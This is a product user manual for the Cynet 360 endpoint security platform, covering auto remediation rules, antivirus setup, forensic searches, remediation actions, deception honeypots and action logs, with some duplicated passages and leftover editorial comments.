The Auto Remediation page enables the Operator to manage rules that let Cynet 360 automatically perform remediation actions when an alert is generated. You can configure these rules to match alerts based on a number of factors. Cynet 360 takes remediation action mitigating the threat.

There are two ways to create Auto Remediation rules, using the Actions menu (as described below) and using the Alerts menu. For instructions on how to do so using the Alerts menu, see the Zendesk article, “Recommended Auto Remediation Rules”.

To access the Auto Remediation page, click Actions>Auto Remediation.

ColumnDescription
NameThe name of the Auto Remediation rule.
DescriptionThe description of the Auto Remediation rule.
RemediationThe remediation action taken when this rule is matched.

To filter the information displayed, select an option from the drop-down menu.

PriorityThe order in which the Auto Remediation rules are processed.
Date InThe date and time when you create the Auto Remediation rule.
Is EnabledFilters alerts according to whether the selected remediation is enabled or not or selects all.

Creating Auto Remediation Rules

To create a new Auto Remediation rule, click Create Rule.

The Auto Remediation rule creation menu opens.

Configuring General Parameters

You can configure the following general parameters:

ParameterDescription
Rule NameEnter an alias for the rule.
DescriptionEnter a description for the rule.
PriorityEnter a number from 1 to 1000 (as per the firewall) used by the system to identify which rule to execute in the case where two Auto Remediation rules match an alert. The lower the number, the higher the priority.

Matching

You can create an auto-remediation rule matched to specific host groups.

The fields required for matching to host groups are as follows:

ParameterDescription
Alert NameEnter a regular expression (RegExp) to match the name of the alert. This enables matching of multiple alerts with individual names according to a pattern. To match all alert names, use the regular expression (.*)
Host GroupsTo match hosts in generated alerts, select host groups from the drop-down menu. When the host in the alert is included in a selected host group, a match is found.

To match to all Host Groups, select all the checkboxes.

Alert SeveritySelect the severity to use when matching generated alerts. When the severity of an alert matches one that you have selected, a match is found.
Advanced Matching

You can also create auto-remediation rules that match specific Files, Users, Networks, and Hosts.

The fields required for Advanced Matching are as follows:

ParameterDescription
FileTo increase the chances of matching this rule to a generated alert you can enter a specific File Hash or File Name.

To match to any File in an alert, leave this field blank.

UserTo increase the chances of matching this rule to a generated alert you can enter a specific User Name.

To match to any User in an alert, leave this field blank.

NetworkTo increase the chances of matching this rule to a generated alert you can enter a specific IP address, Domain, or URL.

To match to any Network criteria in an alert, leave this field blank.

Hosts to Match

To increase the chances of matching this rule to a generated alert you can add a specific Host.

Adding a new Host match:

Click Hosts to Match.

Click Add New Match. COMMENT: Each of these procedure steps should be numbered

In the Group Name field, to match the Host entry, add an alias.

In the Hosts to Match field, to match the Host Name, enter a regular expression.

  1. This enables matching of multiple Hosts with different names according to a pattern.

To match on all Host names, use the regular expression ( .* ).

In the Selected OS field, to find a match based on operating systems, select an operating system from the drop-down menu.

Operating systems in the list are taken from scanned Hosts.

To find a match based on all operating systems, select *ALL* from the drop-down menu.

To edit an existing Host match entry:

Click Hosts to Match.

Click Edit Match.

Note

The Group Name field is not functional when editing an existing Host match entry.

In the Hosts to Match field, to match the Host Name, enter a regular expression.

  1. This enables matching of multiple Hosts with individual names according to a pattern.
  2. To match on all Host names, use the regular expression ( .* ).

In the Selected OS field, to find a match based on operating systems, select an operating system from the drop-down menu.

Operating systems in the list are taken from scanned Hosts.

To find a match based on all operating systems, select *ALL* from the drop-down menu.

Actions

You can select the type of remediation you want to use. You can also decide what actions to take when a match is found.

Remediation Type

You can select the type of remediation from the drop-down menu.

The available options are:

File remediation

Host remediation

User remediation

Network remediation

Action

For each type of remediation selected, you can select an associated action from the drop-down menus.

The options for File Remediation Actions are:

Quarantine File

Delete File

Kill Process

MyRem

The options for Host Remediation Actions are:

Restart Machine

Shutdown Machine

Disable All Nics

Run Command

The option for User Remediation Action is:

Disable User

The option for Network Remediation Action is:

Block Traffic

DNS Remediation

When you have made all the necessary configuration changes for the Auto Remediation Rule, click Save. The new rule appears in the Auto Remediation dashboard.

Cynet Recommendations for Creating Rules

For files:

For alerts that contain “Adware”, set the rule: “Kill Process” only to workstation scanning groups

For alerts that contain “Worm”, set a rule to quarantine the file

For alerts that contain “Backdoor”, set a rule to quarantine the file

For networks:

For alerts that contain “Phishing site”, set a rule to “Block URL

For alerts that contain “Malware Distribution” or “Compromised Website”, set a rule to “Block IP

Note

Rules created for networks are applied to the local machine and not at the DNS level.

Editing Auto Remediation Rules

To edit an Auto Remediation rule, click the Rule Name.

The Auto Remediation editing menu opens.

Edit the rule using the same procedure as in “Creating Auto Remediation Rules.

Deleting Auto Remediation Rules

To delete an Auto Remediation rule, select the rule in the Auto Remediation rule list.

Click Delete.

To delete the rule, click Confirm Delete.

NextGen AV

Cynet 360 has traditionally focused on protecting your organization from new and advanced cyber threats. In this version of Cynet 360, the new antivirus module further reduces the attack surfaces in your environment by also protecting you from known malware. Everything is done under one system with no requirement for an additional external antivirus program.

Note

NextGen AV works with Windows 8 and above.

Activating NextGen AV

To activate NextGen AV:

  1. Make sure that Port 5443 TCP from the endpoint to the server is open.
  2. Install the latest version of the CynetEPS detection engine to the endpoints in your environment.
    For instructions, see section ‎6.2 “Installing the CynetEPS Detection Engine”.
  3. In Cynet 360, enable the Windows Defender antivirus engine.
    For instructions, see section ‎6.3 “Enabling Cynet 360”.

Installing the CynetEPS Detection Engine

Your Cynet support representative will provide the CynetEPS installation file. Install it on every endpoint in your environment.

Enabling Cynet 360 NGAV

To enable Cynet 360 antivirus:

  1. On the main menu, click Settings .
  2. In the Scan Groups tab, scroll down to the Antivirus section and select Antivirus.
  3. In the Antivirus Engines section, Cynet Antivirus Engines and Antivirus Real Time Engine must be selected. If there are more antivirus engines listed, you can select them too.

    Note: You must select at least one antivirus engine.
  4. (Optional) Select Windows Defender to enable Cynet to work with Windows Defender.
  • Make sure that Windows Defender Real Time is selected
  • It is not necessary to select Keep Windows Defender Service Running.

Select the requested Antivirus option.

  • Alert Only- enables alert mode only
    When an alert is triggered, the following dialog box opens:

  • Rename File- changes the .exe to. Cynet so that the User knows that the file is malicious
  • Delete File- to delete the file
  • Click Save.

Understanding Forensics

Performing Favorite Searches

The Forensic page is divided into five distinct sub-sections: Files, Hosts, Users, Domains, and Sockets. Each sub-section provides inventories for all data collected by Cynet 360. Each page of the Forensic section has the same basic layout:

LabelParameterDescription
ASub MenuContains links to the inventories of all Files, Hosts, Users, Domains, and Network sockets observed by the system.
BFavorite SearchesEnables predefined searches to quickly search within the inventories.
CAdvanced SearchEnables the Operator to search within inventories in any of the available metadata fields, or to change the displayed fields in the Inventory List.
DActionsEnables the Operator to export inventories to Excel and/or to take Remediation Action.
EQuick FilterEnables the Operator to quickly filter inventories by metadata and indicators such as file name, risk level, host name, and IP address.
FInventory ListLists every object that matches the filter criteria set in the Quick Filter Bar. To view more information and details about this object, click on the object name.
GTop ResultsShows objects with high risk levels and other risky items.

File Favorite Searches

The Files page contains eight default favorite searches. The searches cannot be edited or deleted. They provide a quick and easy way to search for files based on the following parameters:

ParameterDescription
Internal ComFiles that have network communication to an internal IP address.
External ComFiles that have network communication to an external IP address.
Unique in OrgFiles that are unique within your organization and exist only once.
DLLFiles with the .dll extension.
EXEFiles with the .exe extension.
No GUIFiles that are running in a hidden window.
Detected by Security IntelFiles that have been identified using Cynet’s security intelligence feeds.
Start UpFiles that have made themselves persistent at the endpoint and execute when the computer starts up.
TestWhen performing an Advanced Search, Users can create their own search. Click the star to save this search. It is saved under Favorite Searches with the selected name (for example, Test).

Host Favorite Searches

The Hosts page contains three default favorites that make it quick and easy to search for hosts. The default favorite searches cannot be edited or deleted.

ParameterDescription
High RiskHosts with a high-risk level.
Internal ComHosts that have network communication to an internal IP address.
External ComHosts that have network communication to an external IP address.

User Favorite Searches

The Users page contains three default favorites that make it quick and easy to search for Users. The default favorite searches cannot be edited or deleted.

ParameterDescription
High RiskUser accounts with a high-risk level.
LockedUser accounts that are locked out.
Run Risky FilesUser accounts running high risk files.
Old Password AgeIndicates the last time the password was changed.

Domain Favorite Searches

The Domains page contains two default favorites that make it quick and easy to search for domains. The default favorite searches cannot be edited or deleted. They provide a quick and easy way to search for domains based on:

ParameterDescription
High RiskDomains with a high-risk level.
Detected by Security IntelDomains identified using Cynet’s security intelligence feeds.

Socket Favorite Searches

The Socket page contains one default favorite that makes it quick and easy to search for sockets. The default favorite search cannot be edited or deleted.

ParameterDescription
High RiskNetwork Sockets with a high-risk level.

Taking Actions

This section contains information on all available actions in Cynet.

Actions can be run from the actual Alert, or from the top right of the Forensics and Alert pages.

Auto Remediation can be performed as well. For more information on Auto Custom Remediation, see “Auto Custom Remediation” below.

Taking Actions on an Alert

Alert actions can be used to change an alert status or to perform a remediation action on files, hosts, or Users.

To open the Alert Actions menu:

On the Alerts Dashboard, select one or more alerts.

Click the Actions button.

A menu opens indicating which alerts are currently selected.

You can:

A: Change the Alert Status to Open, Close, or Ignore

B: Add Comments. See “Add Comments

C: Create a whitelist profile. See “Creating an Alert Whitelist Profile from the Whitelist Tab ”

D: Perform additional Analysis actions. See “Analysis Action”

E: Perform Remediation actions. See “Taking Remediation Actions”

Create a new Auto-Remediation rule based on the alert details. See “Configuring Remediation Settings “

Note

Only actionable tabs appear in the Action window, according to the selected alerts.

Domain Actions

The Actions icon enables the Operator to insert an IP/URL of an external address, then to perform a DNS remediation on that address for the entire organization.

Block Traffic

This action blocks specific traffic to and from the selected hosts.

DNS Remediation

This action redirects all traffic to the domain to a specified IP address. A new zone in the internal DNS server is created to resolve this domain to the specified IP address. Any Hosts that attempt to resolve the domain in the network are given the specified IP address from the internal DNS server. Traffic is prevented from reaching the actual domain’s IP address.

Hosts Actions

The Actions icon enables the Operator to run actions on all the Hosts in the organization.

The Actions feature enables the Operator to perform various types of actions on all the Hosts:

Run Command

This action executes the specified commands on all the Hosts. The output is captured and presented in the console. If the output has multiple lines, it is preserved in a text file format.

Run Script

This action enables a specified file to be run on all Hosts.

To run a script on all Hosts:

Select a file from the local computer.

Upload the file to the Cynet server.

The Cynet server deploys the file to the Hosts for execution.

Add Comments

This action inserts a comment to a single alert or to multiple selected alerts simultaneously.

To add a comment to a single or multiple alerts:

From the Alert page, select the alert or alerts.

Click Actions.

Click Add Comments.

In the Add Comment window, enter your comment.

Click Add.

Analysis Action

Operators can take analysis actions on files scanned by Cynet 360.

To take an analysis action, open the Actions menu and select an action from the Analysis tab.

The following Analysis Actions are available:

Analysis ActionDescription
Send to SOCSends the selected file(s) to the Cynet SOC for deep inspection and analysis.
Send to AnalysisSends the selected file(s) to the Server Sent Events (SSE) Sandbox for analysis. This requires that the Cynet SSE sandbox is configured.
Verify FileVerifies that the selected file(s) still exist(s) on the Host(s).
Get Memory StringsPerforms a dump of the strings in memory allocated by the selected file(s).
Pull FilePulls the selected file occurrence from the Host. This action is performed by selecting a specific file occurrence. It requires targeting a specified Host. Once pulled, the sample is available for download from the File Actions page. The sample has its extension stripped and is renamed to the file’s SHA256 hash. This action is limited to files of 100 MB or less.
Deep ScanBegins a deep scan of the selected file occurrence on the Host. This action is performed by selecting a specific file occurrence. It requires a specified instance of a process on a Host.

Deep Scans

Cynet uses Deep Scans of files to monitor a specific file on an endpoint. Deep Scans monitors behaviors of a process for an extended period of time. This is a hybrid analysis combining normal scanning and sandboxing, where the deep scan analysis takes place on the endpoint. Deep Scans are initiated manually.

Initiating a Deep Scan

To initiate a Deep Scan of a file:

In Forensic, navigate to the Files Detail Page.

Click the Occurrences tab of the file to be scanned.

Note

Deep Scans can only be performed on one file per host at a time. After the deep scan has completed on the host, another deep scan can be performed on that host.

Only executable files can be added for Deep Scanning.

On the file’s Occurrence tab, select the file occurrence to be scanned.

Click Actions.

In the Actions menu, click Deep Scan.

Note

When you initiate a Deep Scan on a process occurrence, you are prompted to acknowledge that additional files (such as child processes) may be monitored as part of the scan.

Any currently-running deep scans on this host are terminated.

While the Deep Scan is running, you can view the current status of the scan. To view the current status of the Deep Scan, click the Deep Scans tab on the File Actions page.

When the Deep Scan is complete, the results can be viewed in the Deep Scan tab of the File Details Page of the specified file.

There are two options to view results: Advanced and Normal.

Advanced View shows additional information such as Hostname, Scope of the event or object, First Seen, and Last Seen timestamps.

Whitelisting Actions

The Whitelisting tab enables you to create whitelist profiles. Select alert activities such as files, processes, and commands, or the hosts, servers, and endpoints displayed in the Whitelisting tab to ensure that future alerts are disabled for the selection.

For more information, see “Creating an Alert Whitelist Profile from the Whitelist Tab ”.

A screenshot of a cell phone Description automatically generated

ParameterDescription
Profile NameUser given name of the profile to whitelist
Whitelist byLists the components of the alert by activities
Whitelist forLists the components of the alert by affected recipients

Taking Remediation Actions

You can take Remediation Actions on objects scanned by Cynet 360.

To take a Remediation Action:

Navigate to Forensic.

Select the file on which you want to take action.

Click .

Select the Remediation tab.

Select the Remediation Action you want to perform.

The Remediation tab has a sub-menu that enables navigation between the Remediation Actions available in the system.

File Remediation Actions

Cynet can take Remediation Actions on files observed on endpoints in the environment. File Remediation Actions can be taken from any Actions menu. The results of a File Remediation Action are recorded in the File Actions page.

The following File Remediation Actions are available:

Remediation ActionDescription
Delete FileDeletes the selected File from the Host.
Quarantine FileQuarantines the selected file from the host. A list of Quarantined files can be found on the File Actions Page.
Kill ProcessKills the selected process on the hosts. This action leaves the file intact, only killing the process loaded in memory.

User Remediation Actions

Cynet can take Remediation Actions on Users observed in the environment. User Remediation Actions can be taken from any Actions menu. The results of a User Remediation Action are recorded in the User Actions page.

The following User Remediation Actions are available:

Remediation ActionDescription
Enable UserEnables the selected User account if it was disabled.
Disable UserDisables the selected domain or local User account.

Host Remediation Actions

Cynet can take Remediation Actions on Hosts scanned in the environment. Host Remediation Actions can be taken from any Actions menu. The results of a Host Remediation Action are recorded in the Host Actions page.

The following Host Remediation Actions are available:

Remediation ActionDescription
ScanRescans the selected Host.
Shut DownShuts down the selected Host.
RestartReboots the selected Host.
Change IPChanges the IP address of the Host.
Disable All NICsDisables the Network Interface Card (NIC) on the selected Host. Using this action prevents any further remote connections to the Host.
Run CommandExecutes the specified commands on the selected Host. The output is captured and presented in the console. When the output contains multiple lines, it is preserved in a text file format.
Pull FilePulls an existing file from the endpoint.
Run ScriptUploads a script and runs it on the endpoint.
Delete ServiceDeletes the specified service on the selected Host.
Disable ServiceDisables the specified service on the selected Host.
Delete Schedule TaskDeletes the specified scheduled task on the selected Host.
Disable Schedule TaskDisables the specified scheduled task on the selected Host.
IsolateIsolates the endpoint for access only to the Cynet server and Active Directory Server.
Un-IsolateRemoves the Host isolation by removing the communication filter.

Domain Remediation Actions

Cynet can take Remediation Actions to block network connections observed in the environment for a specific domain. Domain Remediation Actions can be taken from the Actions menu. The results of a Domain Remediation Action are recorded in the Network Actions page.

The following Domain Remediation Actions are available:

Remediation ActionDescription
Block TrafficBlocks traffic to specified IP addresses and domains. IP addresses are blocked by modifying the route table on the selected Host. Traffic to these IPs loops back to the localhost IP address. Domains are blocked by creating an entry in the hosts file for the selected Host and the domain resolves to the localhost IP address.
DNS RemediationRedirects all traffic to the domain to a specified IP address. Cynet does this by creating a new zone in the internal DNS server to resolve this domain to the specified IP address. Any Hosts that attempt to resolve the domain in the network receive the specified IP address from the internal DNS server. Traffic is prevented from reaching the actual domain’s IP address.

Auto-Remediation Actions

Operators can associate Auto-Remediation Actions to be triggered on Alerts, or create an Auto-Remediation rule on-the-fly.

As detailed in the Automatically Remediate Alerts section, Auto-Remediation is applied only upon strict rule-matching, based on the Alert’s entities (Files, Users, Hosts, or Network).

As for the rules, Auto-Remediation actions enable granular actions on the Alert’s aspects: Files, Users, Hosts, or Network.

To associate an Auto-Remediation Action to an Alert, or create an Auto-Remediation Action, through the Alerts View:

  • Navigate to Alerts.
  • Select the Alert on which you want to take action.
  • Click .
  • Open the Auto-Remediation tab.
  • To associate an existing Auto-Remediation Rule – Select the Auto-Remediation pre-defined Rule you want to associate with the Alert (the Auto-Remediation action can be available as part of the “Chosen Alerts” top pane in the Alert expandable right-hand drawer).
  • It is also possible to create a new Auto-Remediation rule, by using the bottom section of the Set the Alert expandable right-hand drawer, by setting the Auto-Remediation rules to control the Auto-Remediation Action to be triggered) for more details refer to the Automatically Remediate Alerts section

Actions Page

The Actions page has six subsections. These are Files, Hosts, Users, Network, Playbooks, and Auto Remediation. Each subsection lists actions taken by Cynet 360.

Each page of the Actions section has the same basic layout:

A: The Sub-Menu

The Submenu has tabs for the following interfaces:

  • File Actions
  • Host Actions
  • User Actions
  • Network Actions
  • Playbook Actions
  • Auto Remediation

B: Action Tabs

Some action pages, such as the File Actions page, have Action Tabs providing additional actions to take. These include:

  • Analysis – See “Hosts Actions”

The Actions icon enables the Operator to run actions on all the Hosts in the organization.

The Actions feature enables the Operator to perform various types of actions on all the Hosts:

Run Command

This action executes the specified commands on all the Hosts. The output is captured and presented in the console. If the output has multiple lines, it is preserved in a text file format.

Run Script

This action enables a specified file to be run on all Hosts.

To run a script on all Hosts:

Select a file from the local computer.

Upload the file to the Cynet server.

The Cynet server deploys the file to the Hosts for execution.

Add Comments

This action inserts a comment to a single alert or to multiple selected alerts simultaneously

To add a comment to a single or multiple alerts:

From the Alert page, select the alert or alerts.

  • Click Actions.
  • Click Add Comments.
  • In the Add Comment window, enter your comment.
  • Click Add.
  • Analysis Action
  • Deep Scan – See “Deep Scans”
  • Deception Files Actions – SeeRunning Host Scans

The Scanner page enables Operators to start and stop host scans and to view the status of host scans. They can perform ad hoc scans by clicking the Manual Scans tab.

The Scanner page also enables Operators to perform the following functions:

SectionParameterDescription
AScanner Action Buttons:Enables Operators to perform scan-related actions such as:
  • Start / Stop Scanner
Start or Stop the Scanner service.
  • Restart Scans
Clears all displayed scan history and initiates the scanner service to rescan all Hosts immediately.
  • Export Scan Errors
Exports scan errors to an Excel file.
  • Export Never-Scanned Endpoints
Exports unscanned Hosts to an Excel file.
  • Disable/Enable Auto Refresh
Disables or Enables auto-refreshing of the scanned endpoints Table Data.
  • Reload Table Data
Refreshes the Scanned Endpoints Table with the latest scan data received from the endpoints.
BQuick FilterEnables Operators to quickly filter scanned Hosts by IP/Host, Scan Group, Scan, Start Scan, End, Status, Status Distribution, or details.
CToday ScansDisplays the combined number of successfully scanned and failed scanned endpoints.
DScanned EndpointsLists the attempted scans on endpoints by Cynet 360 according to the configuration settings in Scan Groups. See “Scan Groups”.
EExcelEnables Operators to export the complete or filtered view of the scanner page.
FActionsEnables Operators to restart a scan.
  • Deceptions
  • Cynet360 deploys deception entities (honeypots) in your network to lure attackers. When these entities are used, Cynet 360 detects them and raises an alert on the illicit activity.

Each Deception alert contains details about which type of deception was triggered, the attacker IP address, the Victim IP address, hostname, and File name, if applicable.

The types of deceptions are:

  • Deception Users
    • Decoy Users and host names.
  • Deception Files
    • Decoy files
  • Deception Network
    • Decoy hosts and endpoints on the network.

To enable these deceptions:

  • Activate the deception types.
  • Configure the deception types.

Deception Users

Activating Deception Users

To activate deception users and files:

  1. On the main menu, click .
  2. In the Scan Groups tab, navigate to Deception Users.
  3. Click Enable Deception Users.

Configuring Deception Users

To configure deception Users:

  • On the main menu, click .
  • Click Deceptions.
  • Click the Users tab.

To create a new deception User:

  • Click Create.
  • Select the Scan Group.
  • Enter a User Name.
  • Enter a Host Name.
  • Enter a User Type.
  • Click Add.

To edit an existing Deception User, click Edit and change the required settings.

To remove an existing Deception User, click Remove.

Deception Files

Cynet 360 supports different types of deception files.

Deception TypeDescription
Office DocumentsCynet deploys Excel, Word, and PowerPoint documents to the host in a newly created user directory. These files contain beacons. When they are opened, they communicate with the Cynet server and generate an alert. Cynet enables Users to create their own deception files.
Remote Desktop FilesCynet deploys RDP files with saved imitation credentials on the host. When this file is executed, it attempts to connect to the Cynet server with invalid credentials and generates an alert.
ODBCCynet configures an Open Database Connectivity (ODBC) connection on the host which points to the Cynet server. When this connection is used, it generates an error and an alert.
NetBIOSCynet can configure network shares on the host, which are monitored. When the session is used, it generates any alert.
Stored CredentialsCynet implants invalid credential information in the Windows Credential Manager. If these credentials are obtained by an attacker and used for authentication elsewhere in the environment, an alert is generated.
Text FilesCynet deploys text files to the host with invalid credentials. These credentials disguise themselves as domain credentials or credentials to an internal web application. If either of these invalid credentials are used, an alert is generated.

Deception Office Documents

Cynet creates a new user folder such as C:\Users\admin_c493d82, with a randomly generated account name.

Within this directory, there will be several deception Office documents such as Word (.docx), Excel (.xlsx), and PowerPoint (.pptx) files. These files contain attractive filenames to lure attackers and are placed through the new user directory.

When one of these files is opened with Microsoft Office, the beacon within the document attempts to communicate with the Cynet server as well as the Cynet-controlled Web domain ad-stats.com. This ensures that the Cynet SOC can identify when deception files are opened outside the corporate LAN environment.

Deception RDP Files

Cynet creates a saved RDP connection file in the same directory as described above. The RDP connection file contains invalid credentials. The file attempts an RDP connection to the Cynet server on port TCP 8484 and fails. When the RDP attempt is made, an alert is generated in the Cynet console.

Deception ODBC Connection

ODBC is an open standard API for accessing databases. ODBC statements are used to connect to various databases such as Access, dBase, DB2, Excel, and others. Cynet uses the Windows built-in programming support for ODBC by planting an ODBC connection to a non-existent database in the environment. When an attacker attempts to use this ODBC connection to connect to the invalid database, an alert is generated in the Cynet console.

Cynet implants the ODBC connection by deploying various registry keys to the Windows host. The implanted ODBC can also be found in Control Panel > System & Security > Administrative Tools > Data Sources (ODBC).

To list the implanted connection as an SQL Server, click the System DSN tab.

Deception Text Files

Cynet can deploy text files with invalid domain credentials within a newly created user directory. Cynet can also deploy text files with credentials for a non-existent internal application. If the domain credentials are used for authentication or if the URL is accessed, an alert is generated in the Cynet console.

Deception Stored Credentials

The Windows Credential Manager is the “digital locker” where Windows stores login credentials on the network. This data can be accessed by Windows or other applications that use the stored credentials. There are three main types of stored credentials in the Credential Manager:

Windows Credentials

Only used by Windows and its services. For example, saved credentials for a network shared folder.

Certificate-based Credentials

Used together with smart card authentication. This is usually configured in higher security networks with Active Directory configured for smart card authentication.

Generic Credentials

General saved credentials that are defined by applications used on the computer. For example, Office365 or Windows Live.

Credentials saved in the Credential Manager are commonly targeted by threat actors. Cynet 360 plants invalid username and password credentials in the Credentials Manager. When a threat actor uses these credentials to authenticate in the environment, an alert is generated.

Activating Deception Files

To activate deception users and files:

  • On the main menu, click .
  • In the Scan Groups tab, navigate to Deception Files.
  • Click Enable Deception Files.

Configuring Deception Files

To configure deception Files:

  • On the main menu, click .
  • Click Deceptions.
  • Click the Files tab.

From here you can:

  • Add a new deception file
  • Edit existing deception files
  • Enable deception files in groups

Decoy File Listener Port

This is the listener port that decoy files use when beaconing back to the Cynet server. The protocol used is TCP.

Enabling Decoy Files in a Group

To enable a Deception File in a Group:

  • Click the file name or .
  • Click ..
  • Select an option to deploy.

Adding a New Deception File

Users can create a new Decoy File from an existing Office file.

To Add a New Deception File:

  1. From Settings>Deception tab, click Add New Decoy File.
  2. Selected a file to use as the Decoy.
  3. Click Generate Test File.
    1. A test Decoy File is downloaded to the destination of your choice.
    2. Enter a file name.
    3. Select a group.
    4. Select file deployment locations.

When this file is accessed, Cynet generates an alert.

Deception Network

Cynet 360 deploys deception entities (honeypots) in your network to lure attackers. When these entities are used, Cynet 360 detects them and generates an alert on the illicit activity.

To enable this feature:

  1. Activate the Deception Network.
  2. Configure the Deception Network.

Activating the Deception Network

To activate the Deception Network:

  • On the main menu, click .
  • Click the Scan Groups tab and navigate to Deception Network.
  • Click Enable, then Save.

Configuring the Deception Network

To configure the Deception Network:

On the main menu, click .

  1. Click the Deception tab.
  2. Click the Network tab.
  3. In the Max Decoy Hosts Per Endpoint field, enter the maximum number of hosts for each endpoint. The default is 10.
  4. In the Select Group field, enter the scan group to configure.
  5. Add a single or multiple decoy.
    • To manually add a single decoy, click Add.
    • To import multiple decoys from a CSV file, click Import.
    • To see how the CSV file must be set up, click Download CSV Example.

A screenshot of a cell phone Description automatically generated

Note: You can add and import as many decoys as you want, but only the maximum number will be distributed on your network. The decoys to be uploaded are selected by Cynet 360 at random.

To delete a decoy, select it from the list and click Delete Selected Decoys.

To delete all decoys, click Delete All Decoys.

IMPORTANT: Any change to the list of decoys (adding, importing, or deleting) causes Cynet 360 to automatically select new decoys.

A screenshot of a cell phone Description automatically generated

C: The Quick Filter Bar

The Quick Filter Bar enables the Operator to quickly filter actions by file name, host name, IP address, and actions taken.

D: The Actions Area

The Actions Area enables the Operator to export displayed action lists to an Excel file and to take additional remediation actions. See “Hosts Actions

The Actions icon enables the Operator to run actions on all the Hosts in the organization.

The Actions feature enables the Operator to perform various types of actions on all the Hosts:

Run Command

This action executes the specified commands on all the Hosts. The output is captured and presented in the console. If the output has multiple lines, it is preserved in a text file format.

Run Script

This action enables a specified file to be run on all Hosts.

To run a script on all Hosts:

  1. Select a file from the local computer.
  2. Upload the file to the Cynet server.

The Cynet server deploys the file to the Hosts for execution.

Add Comments

This action inserts a comment to a single alert or to multiple selected alerts simultaneously

To add a comment to a single or multiple alerts:

  1. From the Alert page, select the alert or alerts.
  2. Click Actions.
  3. Click Add Comments.
  4. In the Add Comment window, enter your comment.
  5. Click Add.

Analysis Action” and “File Remediation Actions”.

E: The Actions List

This section provides a list of all actions taken on Files, Hosts, Users, and Network traffic.

File Actions Tab

The File Actions tab provides visibility of all actions taken on files in the environment. See “File Remediation Actions”. The File Actions list contains the following information:

ParameterDescription
File NameThe name of the File on which action was taken.
Host NameThe name of the Host on which action was taken.
Host IPThe IP address of the Host on which action was taken.
TimeThe time that the file action was initiated.
Action TakenThe type of file action taken.
StatusThe result of the file action taken.
Status InfoAdditional information about the file action taken.
RetriesSelect the range of Retry numbers to filter by
Last Retry TimeDelimits the relevant Retry time frame to filter by
Note: The maximum number of retries is 48.

Analysis Actions Tab

The Analysis Actions tab provides information on all file analysis actions taken on files in the environment.

The Analysis list contains the following information:

ParameterDescription
File PathThe File name and the path of the File on which the action was taken.
Host NameThe name of the Host on which action was taken.
HashesThe Hash of the file on which the analysis action was taken.
Start TimeThe time interval during which this action was started.
Last SeenThe time interval during which that action was last seen.
Static ResultThe result of the static analysis on the file.
Dynamic ResultThe result of the dynamic analysis on the file.

Deep Scans Tab

The Deep Scans tab provides information on all deep scan actions taken on files in the environment. See “Hosts Actions

The Actions icon enables the Operator to run actions on all the Hosts in the organization.

The Actions feature enables the Operator to perform various types of actions on all the Hosts:

Run Command

This action executes the specified commands on all the Hosts. The output is captured and presented in the console. If the output has multiple lines, it is preserved in a text file format.

Run Script

This action enables a specified file to be run on all Hosts.

To run a script on all Hosts:

  1. Select a file from the local computer.
  2. Upload the file to the Cynet server.

The Cynet server deploys the file to the Hosts for execution.

Add Comments

This action inserts a comment to a single alert or to multiple selected alerts simultaneously.

To add a comment to a single or multiple alerts:

  1. From the Alert page, select the alert or alerts.
  2. Click Actions.
  3. Click Add Comments.
  4. In the Add Comment window, enter your comment.
  5. Click Add.

Analysis Action” and “Deep Scans”.

The deep scan list contains the following information:

ParameterDescription
Scan IDA unique identifier for the Deep Scan that was initiated.
Host NameThe Host name on which the Deep Scan was initiated.
File NameThe File name on which the Deep Scan was initiated.
SHA256The Hash of the file on which the Deep Scan was initiated.
Date InThe date and time of when the Deep Scan action was initiated.
Last HeartbeatThe date and time of when the Deep Scanner last checked in with the Cynet server.
StatusThe last status update from the Deep Scanner.
Scan DetailDetails about the deep scan such as duration (in minutes), percentage completed, and the number of actions monitored by the deep scanner.

Decoy Files Actions

The Decoy File Actions tab provides information about all actions taken in relation to decoy or deception files deployed across the system.

ParameterDescription
Root DirectoryThe name of the Decoy File Root Directory
Full PathThe full path of the Decoy File
TypeThe type of Decoy File
Host NameThe Host Name where the Decoy File is located
ActionThe type of action taken
Last Attempt StatusThe status of the Last Attempt
Last Attempt Error CodeThe Error Code of the Last Attempt
Last Attempt Error DetailsThe Operator-defined details
Last Attempt Error TimeThe time delimited period for the relevant Last Attempt

Send to Soc Tab

The Send to Soc tab provides information about all the files that have been sent to the SOC for further analysis or action. The Sent to SOC table contains the following information:

ParameterDescription
File PathThe File name and the path of the File on which the action was taken.
Host NameThe name of the Host on which action was taken.
HashesThe Hash of the file on which the analysis action was taken.
Start TimeThe time interval during which this action was started.
End TimeThe time interval during which that action was ended.
StatusThe status of the action taken.

Host Actions

The Host Actions tab provides information on all actions taken on Hosts in the environment. The Host Actions list contains the following information:

ParameterDescription
Host NameThe Host name on which the Action was taken.
TimeThe time the Host action was initiated.
Action TakenThe type of Host action taken.
StatusThe result of the Host action taken.
Status InfoInformation about the Host action taken.
Extra DetailsAdditional Information about the Host action taken.
RetriesSelect the range of Retry numbers to filter by
Last Retry TimeDelimits the relevant Retry time frame to filter by
    1. Note
      1. The maximum number of retries is 48.

Users Actions

The Users Actions tab provides information on all actions taken on Users in the environment. The User Actions list contains the following information:

ParameterDescription
User NameThe User account on which the Action was taken.
Host NameThe Host name on which the User Action was taken.
TimeThe time the User Action was initiated.
Action TakenThe type of User Action taken.
StatusThe result of the User Action taken.
Status InfoInformation about the User Action taken.
RetriesSelect the range of Retry numbers to filter by.
Last Retry TimeDelimits the relevant Retry time frame to filter by.
Note: The maximum number of retries is 48.

Network Actions

The Network Actions tab provides visibility of all actions taken on network traffic in the environment. (See also “Taking Remediation Actions”.) The Network Actions list contains the following information:

The Network Actions page provides information on all actions taken on Network traffic in the environment. The Network Actions list contains the following information:

ParameterDescription
Network NameThe Network object on which the Action was taken.
Host NameThe Host name on which the Network Action was taken.
TimeThe time the Network Action was initiated.
Action TakenThe type of Network Action taken.
StatusThe result of the Network Action taken.
Status InfoInformation about the Network Action taken.
RetriesSelect the range of Retry numbers to filter by.
Last Retry TimeDelimits the relevant Retry time frame to filter by.
Note: The maximum number of retries is 48.

Running Manual Scans

The Manual Scans page enables Operators to initiate a manual scan of a Host and to view the status of an initiated manual scan.

This applies only to Interval mode.

The Manual Scans Page has three main sections:

SectionParameterDescription
AHost Name / IPEnter the Host Name or the IP address of a Host to be manually scanned.
BQuick FilterEnables Operators to quickly filter manually-scanned hosts by Scan Date, IP/Hostname, Distribution Type, Scan Status, or Scan Details.
CManual Scans ListLists the endpoints that Cynet 360 attempted to scan using Manual Scans.

IMPORTANT!

